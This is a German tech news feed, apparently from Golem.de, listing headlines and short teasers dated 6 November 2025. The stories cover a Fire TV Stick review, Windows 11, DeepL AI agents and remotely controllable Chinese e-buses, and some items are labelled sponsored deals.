Fire TV Stick 4K Select im Praxistest: Darum braucht wirklich niemand diesen Amazon-Stick

Neues Betriebssystem, alte Oberfläche und zu viele Beschränkungen: Wir erklären im Test, warum Amazons neuer Fire-TV-Stick so enttäuscht. Ein Praxistest von Ingo Pakalski (Fire TV Stick, Amazon)

Article link

Date of publish: Thu, 06 Nov 2025 12:00:01 +0100

Smartphones: Verwirrung um zusätzlichen Empfangsbalken bei Android

Netzanbieter können bei Android immer einen Balken mehr bei der Empfangsdarstellung anzeigen lassen. Der Hintergrund ist allerdings erklärbar. (Android, Smartphone)

Article link

Date of publish: Thu, 06 Nov 2025 11:51:02 +0100

Anzeige: Vielseitiges Carplay-Display für unter 50 Euro bei Amazon

Amazon hat ein Carplay-Display mit 7 Zoll IPS-Bildschirm im Angebot, das auch Android Auto unterstützt und eine Freisprechfunktion enthält. (Carplay, Airplay)

Article link

Date of publish: Thu, 06 Nov 2025 11:42:01 +0100

Impossible Lightsaber: Youtuber baut ausfahrbare Klinge in Lichtschwertgriff

Mit transparentem Magierstab und Rotation hat das ausfahrbare Lichtschwert in Luke Skywalkers Griff viele Blicke auf der Comic Con auf sich gezogen. (Star Wars, Spielzeug)

Article link

Date of publish: Thu, 06 Nov 2025 11:40:02 +0100

KI für Unternehmen: DeepL-KI-Agent und Customization Hub erhältlich

Die neuen Produkte von DeepL übernehmen mithilfe von KI zeitintensive Routineaufgaben und Lokalisierungsprozesse. (DeepL, KI)

Article link

Date of publish: Thu, 06 Nov 2025 11:27:01 +0100

Anzeige: 32-Zoll-Curved-Gaming-Monitor mit WQHD jetzt unter 180 Euro

Für Gaming und Homeoffice: Der 32-Zoll-Monitor von Minifire fällt zurück auf seinen Tiefstpreis und bietet starke Technik für kleines Geld. (TV & Monitore, Display)

Article link

Date of publish: Thu, 06 Nov 2025 11:22:02 +0100

Call of Duty: Black Ops 7 startet mit Handheld-Optimierung

Activision und Treyarch nennen Termin, Systemanforderungen und Besonderheiten der PC-Version, die auch auf Windows-Handhelds angepasst wurde. (Call of Duty, Activision)

Article link

Date of publish: Thu, 06 Nov 2025 11:07:01 +0100

Microsoft: Rechtsklick-Menü von Windows 11 wird aufgeräumt

Microsoft hört offenbar auf seine Nutzer und will das Rechtsklick-Menü von Windows 11 aufräumen. Es könnte wesentlich übersichtlicher werden. (Windows 11, Microsoft)

Article link

Date of publish: Thu, 06 Nov 2025 10:32:01 +0100

Fernzugriff per SIM-Karte: Auch dänische Elektrobusse aus China steuerbar

Der Hersteller Yutong kann seine Elektrobusse theoretisch jederzeit aus der Ferne lahmlegen. In Dänemark sind die Fahrzeuge großflächig im Einsatz. (Security, Elektroauto)

Article link

Date of publish: Thu, 06 Nov 2025 10:22:02 +0100

Für Bot-Farmen und Doom-LANs: So sieht ein Mainboard mit 36 USB-Ports aus

"Das sind fast genug Ports für meine Flugsimulator-Ausrüstung", schreibt eine Person auf Reddit. Jemand anderes würde damit Mittagessen erwärmen. (USB, Mainboard)

Article link

Date of publish: Thu, 06 Nov 2025 10:01:02 +0100

Anzeige: Akku-Kompressor jetzt für keine 20 Euro mitnehmen

Derzeit gibt es bei Amazon ein interessantes Angebot zu einem gut ausgestatteten Akku-Kompressor. Er ist für unter 20 Euro erhältlich. (Auto, Amazon)

Article link

Date of publish: Thu, 06 Nov 2025 09:52:01 +0100